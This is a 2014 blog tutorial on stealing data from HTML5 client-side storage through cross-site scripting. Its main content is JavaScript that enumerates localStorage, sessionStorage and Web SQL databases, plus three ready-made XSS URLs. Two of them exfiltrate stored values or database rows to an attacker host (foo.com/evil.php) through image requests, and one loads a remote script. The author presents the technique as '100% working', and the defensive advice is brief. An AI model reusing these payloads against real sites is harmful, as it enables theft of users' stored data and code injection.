Client-side Storage using HTML5, really secure or just an abuse ?

by | Nov 20, 2014 | Howtos, HTML, Programming, Storages | 0 comments

HTML5 has introduced some new ways to save huge amount of data on the PC through the browser (use chromium…
HTML5 has introduced some new ways to save huge amount of data on the PC through the browser (use chromium or chrome to see how this work) Hakcers could steal or modify sensitive data online or offline. If a web application which uses this kind of storage ( client-side ) is vulnerable to XSS attacks we can use an attack payload to read or modify the content of known storage keys on the computer’s victim. If the web application loads data or code from the local storage, could be also quite powerful to inject malicious code that will be executed every time the web application will request it.

Working technique : ( 100% working technique, i got success while doing this, you just have to use your brain )

Storage Object Enumeration

var ss = “”;
for(i in window.sessionStorage)
{
ss += i + ” “;
}
var ls = “”;
for(i = 0; i < localStorage.length; i++)
 {
ls += localStorage.key(i) + ” “;
 }

Database Object Enumeration

var db = “”;
for(i in window)
{
if(window[i] == “[object Database]”)
{
db += i + “ “;
}
}

Extracting Database Metadata

SELECT name FROM sqlite_master WHERE type=’table’
SELECT sql FROM sqlite_master WHERE name=’table_name’
SELECT sqlite_version()

One Shot Attack :

http://blah_blah.com/page.php?name=<script>document.write(‘<img
src=”http://foo.com/ evil.php?name=’ %2B globalStorage[location.hostname].mykey %2B ‘”>’);</script>

http://blah_blah.com/page.php?name=<script>db.transaction(function (tx) { tx.executeSql (“SELECT * FROM client_tb”, [], function(tx, result){ document.write(‘<img src=”http:// foo.com/evil.php?name=’ %2B result.rows.item(0)[‘col_data’] %2B ‘”>’); }); });</script>

http://example.com/page.php?name=<script src=http://foo.com/evil.js>
</script>


Defenses
Website: Avoid saving sensitive data on the users machine and clear
the client-side storage whenever possible.

Web Browser: Web users should check regularly the content of the
HTML5 client-side storage saved by their browser (delete?).

LSO Storage Locations: ( i know only for linux, not a windows user unfortunately :p )

Linux :

/home/$user/.macromedia/Flash_Player/#SharedObjects

Written By Rishi Giri

Related Posts

Comments

0 Comments

0 Comments

Submit a Comment


Subscribe For Instant News, Updates, and Discounts

Pin It on Pinterest

Shares
Share This